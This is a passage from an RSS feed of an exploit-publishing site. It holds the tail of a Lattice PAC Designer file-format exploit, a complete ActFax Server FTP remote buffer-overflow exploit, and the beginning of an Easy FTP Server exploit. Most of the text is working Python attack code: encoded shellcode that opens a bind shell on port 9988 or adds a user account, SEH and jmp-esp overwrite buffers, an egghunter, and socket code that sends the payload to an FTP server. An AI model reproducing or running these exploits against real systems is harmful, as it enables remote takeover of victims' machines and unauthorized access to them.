&quot;\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43&quot;
&quot;\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61&quot;
&quot;\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47&quot;
&quot;\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30&quot;
&quot;\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69&quot;
&quot;\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67&quot;
&quot;\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76&quot;
&quot;\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58&quot;
&quot;\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76&quot;
&quot;\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35&quot;
&quot;\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49&quot;
&quot;\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55&quot;
&quot;\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30&quot;
&quot;\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77&quot;
&quot;\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b&quot;
&quot;\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51&quot;
&quot;\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31&quot;
&quot;\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e&quot;
&quot;\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47&quot;
&quot;\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76&quot;
&quot;\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73&quot;
&quot;\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66&quot;
&quot;\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65&quot;
&quot;\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45&quot;
&quot;\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37&quot;
&quot;\x70\x30\x53\x79\x6f\x68\x55\x41\x41&quot;)
&nbsp;
#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                            #
# nSEH: \xEB\x05                                                                     #
#------------------------------------------------------------------------------------#
b00m = &quot;\x90&quot;*20 + shellcode
payload = &quot;A&quot;*98 + &quot;\xEB\x05\x79\x28\x51\x77&quot; + b00m + &quot;C&quot;*(5000-len(b00m))
&nbsp;
PAC2 = &quot;&quot;&quot;&lt;/Value&gt;
  &lt;/Symbol&gt;
&lt;/SymbolicSchematicData&gt;
&nbsp;
&lt;/PacDesignData&gt;&quot;&quot;&quot;
&nbsp;
buffer = PAC1 + payload + PAC2
&nbsp;
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.exploit-id.com/local-exploits/lattice-semiconductor-pac-designer-6-21-pac-exploit/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ActFax Server FTP Remote BOF (post auth) Bigger Buffer</title>
		<link>http://www.exploit-id.com/remote-exploits/actfax-server-ftp-remote-bof-post-auth-bigger-buffer</link>
		<comments>http://www.exploit-id.com/remote-exploits/actfax-server-ftp-remote-bof-post-auth-bigger-buffer#comments</comments>
		<pubDate>Wed, 08 Jun 2011 18:29:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Python]]></category>
		<category><![CDATA[Remote Exploits]]></category>
		<category><![CDATA[b33f]]></category>

		<guid isPermaLink="false">http://www.exploit-id.com/?p=3573</guid>
		<description><![CDATA[?View Code WINDOWS#!/usr/bin/python &#160; #----------------------------------------------------------------------------------- # Exploit Title: ActFax Server FTP Remote BOF (post auth) # Author: b33f - Ruben Boonen # Software Link: http://www.actfax.com/download/actfax_setup_en.exe # Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation #----------------------------------------------------------------------------------- # Credit goes to chap0 for discovering the bug. # Allot of thanks to PoURaN, for helping [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p3573code8'); return false;">View Code</a> WINDOWS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p35738"><td class="code" id="p3573code8"><pre class="windows" style="font-family:monospace;">#!/usr/bin/python
&nbsp;
#-----------------------------------------------------------------------------------
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Author: b33f - Ruben Boonen
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation
#-----------------------------------------------------------------------------------
# Credit goes to chap0 for discovering the bug.
# Allot of thanks to PoURaN, for helping a n00b understand assembly better!!!
#-----------------------------------------------------------------------------------
&nbsp;
import socket
import sys
&nbsp;
print &quot;\nActFax XP SP3 Pro...&quot;
print &quot;Hunting for alphanumeric code!!\n&quot;
&nbsp;
#-----------------------------------------------------------------------------------
# payload =&gt; win32_bind LPORT=9988 Size=709 =&gt; Encoder=PexAlphaNum
#-----------------------------------------------------------------------------------
shellcode = (
&quot;\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49&quot;
&quot;\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36&quot;
&quot;\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34&quot;
&quot;\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41&quot;
&quot;\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e&quot;
&quot;\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38&quot;
&quot;\x4e\x56\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47&quot;
&quot;\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48&quot;
&quot;\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38&quot;
&quot;\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c&quot;
&quot;\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e&quot;
&quot;\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48&quot;
&quot;\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x44&quot;
&quot;\x4b\x58\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x38&quot;
&quot;\x49\x58\x4e\x56\x46\x42\x4e\x51\x41\x56\x43\x4c\x41\x33\x4b\x4d&quot;
&quot;\x46\x46\x4b\x48\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x50\x4b\x38&quot;
&quot;\x42\x47\x4e\x51\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x35\x4a\x56&quot;
&quot;\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36&quot;
&quot;\x43\x35\x48\x36\x4a\x56\x43\x33\x44\x33\x4a\x46\x47\x47\x43\x47&quot;
&quot;\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e&quot;
&quot;\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e&quot;
&quot;\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x46\x44\x50&quot;
&quot;\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55&quot;
&quot;\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x55\x43\x45\x43\x55\x43\x44&quot;
&quot;\x43\x35\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x47\x52&quot;
&quot;\x46\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x36\x46\x4a&quot;
&quot;\x4c\x51\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x31&quot;
&quot;\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32&quot;
&quot;\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d&quot;
&quot;\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d&quot;
&quot;\x42\x35\x46\x55\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x39\x4a\x46&quot;
&quot;\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55&quot;
&quot;\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x46\x48\x36\x4a\x46\x43\x46&quot;
&quot;\x4d\x56\x49\x38\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x42\x4e\x4c&quot;
&quot;\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x38\x44\x4e\x41\x53\x42\x4c&quot;
&quot;\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32&quot;
&quot;\x43\x59\x4d\x58\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46&quot;
&quot;\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x44\x4f\x4f&quot;
&quot;\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56&quot;
&quot;\x41\x30\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36&quot;
&quot;\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56&quot;
&quot;\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f&quot;
&quot;\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d&quot;
&quot;\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d&quot;
&quot;\x4f\x4f\x42\x4d\x5a&quot;)
&nbsp;
#-----------------------------------------------------------------------------------
# ASCII encoded  =&gt; Size=52
# Decoded opcode =&gt; E9DE140000 - JMP 0178D7A7
#-----------------------------------------------------------------------------------
farjump = (
&quot;\x25\x4A\x4D\x4E\x55&quot;     # AND EAX,554E4D4A
&quot;\x25\x35\x32\x31\x2A&quot;     # AND EAX,2A313235
&quot;\x2D\x55\x55\x55\x5A&quot;     # SUB EAX,5A555555
&quot;\x2D\x55\x55\x55\x5A&quot;     # SUB EAX,5A555555
&quot;\x2D\x56\x55\x55\x5B&quot;     # SUB EAX,5B555556
&quot;\x50&quot;                     # PUSH EAX
&quot;\x25\x4A\x4D\x4E\x55&quot;     # AND EAX,554E4D4A
&quot;\x25\x35\x32\x31\x2A&quot;     # AND EAX,2A313235
&quot;\x2D\x5D\x60\x4E\x55&quot;     # SUB EAX,554E605D
&quot;\x2D\x5D\x60\x4E\x55&quot;     # SUB EAX,554E605D
&quot;\x2D\x5D\x60\x4E\x55&quot;     # SUB EAX,554E605D
&quot;\x50&quot;                     # PUSH EAX
&quot;\xEB\xC1&quot;)                # JMP SHORT 0112CAE0 (back to the beginning of ESP,
                           # ESP now points to our decoded far-jump).
&nbsp;
#-----------------------------------------------------------------------------------
#
# At crash time our buffer is copied several times into memory (some of these are
# corrupt), so we write some fancy far-jump instruction in ESP. After this is
# decoded in memory we jump to our nop bytes (i think 3de itteration of our buffer).
# Ironically this doesn't even crash the program, only when you close the bind
# shell connection does the program crash...
#
# jmp esp - user32.dll =&gt; 0x7E429353
#-----------------------------------------------------------------------------------
buffer = &quot;\x90&quot;*41 + shellcode + &quot;\x90&quot;*23 + &quot;\x53\x93\x42\x7E&quot; + &quot;\x90&quot;*1 + farjump + &quot;\x90&quot;*175
&nbsp;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.71',21))
s.recv(1024)
s.send('USER ' + 'b33f\r\n')
print (s.recv(1024))
s.send('PASS b33f\r\n')
print (s.recv(1024))
s.send('RETR ' + buffer + '\r\n')
s.close</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.exploit-id.com/remote-exploits/actfax-server-ftp-remote-bof-post-auth-bigger-buffer/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Easy Ftp Server v1.7.0.2 Post-Authentication BoF</title>
		<link>http://www.exploit-id.com/remote-exploits/easy-ftp-server-v1-7-0-2-post-authentication-bof</link>
		<comments>http://www.exploit-id.com/remote-exploits/easy-ftp-server-v1-7-0-2-post-authentication-bof#comments</comments>
		<pubDate>Wed, 01 Jun 2011 18:15:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Remote Exploits]]></category>
		<category><![CDATA[b33f]]></category>

		<guid isPermaLink="false">http://www.exploit-id.com/?p=3368</guid>
		<description><![CDATA[?View Code PYTHON#!/usr/bin/python &#160; # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF # Original Author: dookie2000ca &#124;&#124; Windows XP SP3 Professional # Author: b33f # Windows XP Home SP1 # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip &#160; import socket import sys &#160; #------------------------------------------------------------------------------- #SE Handler is overwritten - offset to SEH 256 #short jump \xEB\x07 #pop pop ret rpcrt4.dll [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p3368code10'); return false;">View Code</a> PYTHON</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p336810"><td class="code" id="p3368code10"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">#!/usr/bin/python</span>
&nbsp;
<span style="color: #808080; font-style: italic;"># Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF</span>
<span style="color: #808080; font-style: italic;"># Original Author: dookie2000ca || Windows XP SP3 Professional</span>
<span style="color: #808080; font-style: italic;"># Author: b33f</span>
<span style="color: #808080; font-style: italic;"># Windows XP Home SP1</span>
<span style="color: #808080; font-style: italic;"># Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">socket</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span>
&nbsp;
<span style="color: #808080; font-style: italic;">#-------------------------------------------------------------------------------</span>
<span style="color: #808080; font-style: italic;">#SE Handler is overwritten - offset to SEH 256</span>
<span style="color: #808080; font-style: italic;">#short jump \xEB\x07</span>
<span style="color: #808080; font-style: italic;">#pop pop ret rpcrt4.dll 78011926</span>
<span style="color: #808080; font-style: italic;">#badchars 0x00 0x0a 0x2f 0x5c</span>
<span style="color: #808080; font-style: italic;">#-------------------------------------------------------------------------------</span>
&nbsp;
bunny = <span style="color: black;">&#40;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>81<span style="color: #000099; font-weight: bold;">\x</span>CA<span style="color: #000099; font-weight: bold;">\x</span>FF<span style="color: #000099; font-weight: bold;">\x</span>0F<span style="color: #000099; font-weight: bold;">\x</span>42<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>6A<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>58<span style="color: #000099; font-weight: bold;">\x</span>CD<span style="color: #000099; font-weight: bold;">\x</span>2E<span style="color: #000099; font-weight: bold;">\x</span>3C<span style="color: #000099; font-weight: bold;">\x</span>05<span style="color: #000099; font-weight: bold;">\x</span>5A<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>EF<span style="color: #000099; font-weight: bold;">\x</span>B8&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>77<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>74&quot;</span> <span style="color: #808080; font-style: italic;"># egghunter marker w00t</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>8B<span style="color: #000099; font-weight: bold;">\x</span>FA<span style="color: #000099; font-weight: bold;">\x</span>AF<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>EA<span style="color: #000099; font-weight: bold;">\x</span>AF<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>E7<span style="color: #000099; font-weight: bold;">\x</span>FF<span style="color: #000099; font-weight: bold;">\x</span>E7&quot;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">#win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai</span>
shellcode = <span style="color: black;">&#40;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>d3<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>b8<span style="color: #000099; font-weight: bold;">\x</span>5d<span style="color: #000099; font-weight: bold;">\x</span>82<span style="color: #000099; font-weight: bold;">\x</span>f8<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>34<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>24<span style="color: #000099; font-weight: bold;">\x</span>f4<span style="color: #000099; font-weight: bold;">\x</span>5f&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>83<span style="color: #000099; font-weight: bold;">\x</span>c7<span style="color: #000099; font-weight: bold;">\x</span>04<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>47<span style="color: #000099; font-weight: bold;">\x</span>13<span style="color: #000099; font-weight: bold;">\x</span>03<span style="color: #000099; font-weight: bold;">\x</span>1a<span style="color: #000099; font-weight: bold;">\x</span>91<span style="color: #000099; font-weight: bold;">\x</span>1a<span style="color: #000099; font-weight: bold;">\x</span>a7<span style="color: #000099; font-weight: bold;">\x</span>58<span style="color: #000099; font-weight: bold;">\x</span>7d<span style="color: #000099; font-weight: bold;">\x</span>9e<span style="color: #000099; font-weight: bold;">\x</span>48<span style="color: #000099; font-weight: bold;">\x</span>a0&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>94<span style="color: #000099; font-weight: bold;">\x</span>0c<span style="color: #000099; font-weight: bold;">\x</span>9c<span style="color: #000099; font-weight: bold;">\x</span>f5<span style="color: #000099; font-weight: bold;">\x</span>d6<span style="color: #000099; font-weight: bold;">\x</span>8b<span style="color: #000099; font-weight: bold;">\x</span>a4<span style="color: #000099; font-weight: bold;">\x</span>08<span style="color: #000099; font-weight: bold;">\x</span>c8<span style="color: #000099; font-weight: bold;">\x</span>1f<span style="color: #000099; font-weight: bold;">\x</span>1b<span style="color: #000099; font-weight: bold;">\x</span>13<span style="color: #000099; font-weight: bold;">\x</span>9d<span style="color: #000099; font-weight: bold;">\x</span>7f<span style="color: #000099; font-weight: bold;">\x</span>83&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>22<span style="color: #000099; font-weight: bold;">\x</span>4a<span style="color: #000099; font-weight: bold;">\x</span>36<span style="color: #000099; font-weight: bold;">\x</span>48<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>07<span style="color: #000099; font-weight: bold;">\x</span>c8<span style="color: #000099; font-weight: bold;">\x</span>a0<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>d7<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>90<span style="color: #000099; font-weight: bold;">\x</span>0f<span style="color: #000099; font-weight: bold;">\x</span>17<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>ef&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>ce<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>d4<span style="color: #000099; font-weight: bold;">\x</span>ee<span style="color: #000099; font-weight: bold;">\x</span>12<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>13<span style="color: #000099; font-weight: bold;">\x</span>cb<span style="color: #000099; font-weight: bold;">\x</span>c6<span style="color: #000099; font-weight: bold;">\x</span>6a<span style="color: #000099; font-weight: bold;">\x</span>d8<span style="color: #000099; font-weight: bold;">\x</span>5e<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>f9<span style="color: #000099; font-weight: bold;">\x</span>bf<span style="color: #000099; font-weight: bold;">\x</span>84&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>15<span style="color: #000099; font-weight: bold;">\x</span>59<span style="color: #000099; font-weight: bold;">\x</span>4f<span style="color: #000099; font-weight: bold;">\x</span>c1<span style="color: #000099; font-weight: bold;">\x</span>a2<span style="color: #000099; font-weight: bold;">\x</span>2d<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>c6<span style="color: #000099; font-weight: bold;">\x</span>35<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>25<span style="color: #000099; font-weight: bold;">\x</span>ea<span style="color: #000099; font-weight: bold;">\x</span>be<span style="color: #000099; font-weight: bold;">\x</span>1c<span style="color: #000099; font-weight: bold;">\x</span>d2&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>9a<span style="color: #000099; font-weight: bold;">\x</span>9d<span style="color: #000099; font-weight: bold;">\x</span>3a<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>5e<span style="color: #000099; font-weight: bold;">\x</span>2c<span style="color: #000099; font-weight: bold;">\x</span>83<span style="color: #000099; font-weight: bold;">\x</span>4c<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>0f<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>09<span style="color: #000099; font-weight: bold;">\x</span>2b<span style="color: #000099; font-weight: bold;">\x</span>f7<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>9a&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>ec<span style="color: #000099; font-weight: bold;">\x</span>04<span style="color: #000099; font-weight: bold;">\x</span>cb<span style="color: #000099; font-weight: bold;">\x</span>ec<span style="color: #000099; font-weight: bold;">\x</span>f0<span style="color: #000099; font-weight: bold;">\x</span>b9<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>64<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>29<span style="color: #000099; font-weight: bold;">\x</span>5f<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>91<span style="color: #000099; font-weight: bold;">\x</span>1d<span style="color: #000099; font-weight: bold;">\x</span>60<span style="color: #000099; font-weight: bold;">\x</span>ff&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>91<span style="color: #000099; font-weight: bold;">\x</span>d6<span style="color: #000099; font-weight: bold;">\x</span>09<span style="color: #000099; font-weight: bold;">\x</span>c3<span style="color: #000099; font-weight: bold;">\x</span>ce<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>5b<span style="color: #000099; font-weight: bold;">\x</span>a7<span style="color: #000099; font-weight: bold;">\x</span>90<span style="color: #000099; font-weight: bold;">\x</span>38<span style="color: #000099; font-weight: bold;">\x</span>18<span style="color: #000099; font-weight: bold;">\x</span>87<span style="color: #000099; font-weight: bold;">\x</span>d8<span style="color: #000099; font-weight: bold;">\x</span>e8<span style="color: #000099; font-weight: bold;">\x</span>76&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>f8<span style="color: #000099; font-weight: bold;">\x</span>95<span style="color: #000099; font-weight: bold;">\x</span>0d<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>90<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>6e<span style="color: #000099; font-weight: bold;">\x</span>15<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>88<span style="color: #000099; font-weight: bold;">\x</span>0c<span style="color: #000099; font-weight: bold;">\x</span>f4<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>78&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>b6<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>15<span style="color: #000099; font-weight: bold;">\x</span>a4<span style="color: #000099; font-weight: bold;">\x</span>17<span style="color: #000099; font-weight: bold;">\x</span>1c<span style="color: #000099; font-weight: bold;">\x</span>f5<span style="color: #000099; font-weight: bold;">\x</span>ca<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>96<span style="color: #000099; font-weight: bold;">\x</span>d5<span style="color: #000099; font-weight: bold;">\x</span>67<span style="color: #000099; font-weight: bold;">\x</span>be<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>64<span style="color: #000099; font-weight: bold;">\x</span>a7&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>26<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>cc<span style="color: #000099; font-weight: bold;">\x</span>86<span style="color: #000099; font-weight: bold;">\x</span>44<span style="color: #000099; font-weight: bold;">\x</span>cc<span style="color: #000099; font-weight: bold;">\x</span>3d<span style="color: #000099; font-weight: bold;">\x</span>86<span style="color: #000099; font-weight: bold;">\x</span>e2<span style="color: #000099; font-weight: bold;">\x</span>48<span style="color: #000099; font-weight: bold;">\x</span>61<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>70<span style="color: #000099; font-weight: bold;">\x</span>0f&quot;</span>
